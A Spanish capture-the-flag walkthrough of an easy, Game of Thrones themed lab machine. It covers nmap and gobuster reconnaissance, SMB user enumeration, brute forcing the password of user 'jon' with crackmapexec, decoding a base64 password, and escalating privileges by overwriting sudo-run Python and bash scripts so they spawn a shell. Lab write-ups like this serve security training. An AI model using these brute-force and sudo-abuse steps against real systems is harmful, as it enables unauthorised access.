Winterfell

✍️ Autor: Zunderrub🔍 Dificultad: Fácil 📅 Fecha de creación: 16/07/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más. También tenemos un servicio SMB.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 172.17.0.2

para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web ambientada en la serie de Juego de Tronos.

Ahora buscaremos directorios y archivos con la herramienta Gobuster a través de:

gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml

Descubrimos un directorio que nos llama la atención que es /dragon.

Vamos a indagar si tenemos acceso al servicio SMB.

smbclient -L 172.17.0.2

Vamos a descubrir usuarios válidos para SMB.

enum4linux 172.17.0.2

🚀 EXPLOTACIÓN

Hemos descubierto un usuario jon. Teniendo en cuenta que la máquina trata de la serie posiblemente sea algún título una contraseña por lo que lo copiamos en un archivo y hacemos fuerza bruta.

crackmapexec smb 172.17.0.2 -u jon -p titulos.txt

Con esas credenciales descubiertas nos conectamos a SMB.

smbclient \\\\172.17.0.2\\shared -U jon

Mostramos el contenido del archivo.

Decodificamos la contraseña que está en base64.

echo "aGlqb2RlbGFuaXN0ZXI=" | base64 -d

Nos conectamos con esas credenciales al usuario jon.

ssh jon@172.17.0.2

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar.

Lo que hacemos es borrar el archivo y crear lo mismo pero con un contenido para tener una shell.

rm .mensaje.py
nano /home/jon/.mensaje.py

import os
os.system('/bin/bash')

sudo -u aria /usr/bin/python3 /home/jon/.mensaje.py

Los binarios que tenemos a nuestra disposición nos permiten leer y listar archivos que pertenecen a Daenerys. Por lo tanto, podemos suponer que uno de los pasos a seguir es explorar algún archivo en su directorio home. Primero, listamos el contenido del directorio y encontramos un archivo llamado mensajeParajon, que podría ser relevante para nuestras acciones.

sudo -u daenerys ls /home/daenerys
sudo -u daenerys cat /home/daenerys/mensajeParaJon

Nos logueamos con daenerys con la contraseña descubierta.

Lo primero que hacemos es leer el archivo y descubrimos que es un script en bash que establece una conexión con otra dirección IP. Sin embargo, al revisar los permisos, notamos que tenemos acceso a él. Por lo tanto, para escalar privilegios, solo necesitamos editar el archivo.

#!/bin/bash
bash

Ejecutamos.

sudo /usr/bin/bash /home/daenerys/.secret/.shell.sh